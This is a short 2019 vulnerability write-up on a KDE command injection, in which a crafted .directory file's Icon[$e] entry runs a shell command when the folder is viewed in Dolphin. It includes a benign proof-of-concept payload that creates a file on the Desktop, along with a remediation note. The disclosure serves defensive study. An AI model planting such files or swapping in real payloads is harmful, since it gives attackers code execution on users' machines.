printer exploitation
13th Septembder 2019

KDE 4/5 Kdesktop File Command Injection


The KDE 4 and 5 (< 5.60.0) versions are found to be affected by the command injection vulnerability in the KdesktopFile class.

The .directory or .desktop file when instantiated fail to safely evaluate the parameters in the Icon parameter which can be abused by the attacker to obtain command injection.

Only by simply downloading or viewing the malicious file in the default Dolphin File manager the malicious file executes itself.

This functionality allows the KDE to load its icon by default.

When we combine this feature with the way KDE handles .desktop and .directory files, we can force the file to evaluate some of the entries within the [Desktop Entry] tag. Some of the entries in this tag include "Icon", "Name", etc.

PROOF OF CONCEPT

You must have Kdesktop Environment running

Create a file called .directory in any folder with the below content:

[Desktop Entry] Type=Directory Icon[$e]=$(echo0>~/Desktop/rce&)

Now whenever the file is viewed either in Dolphin, or on the Desktop (or while browsing an SMB share) the command will execute.

COMMAND BREAKDOWN

Icon[$e]=$(echo0>~/Desktop/rce&)

  • Icon[$e] : Set an environment variable named Icon
  • echo 0 > ~/Desktop/rce & : Create a file on the Desktop named rce

REMEDIATION

Disable shell expansion / dynamic entries for [Desktop Entry] configurations.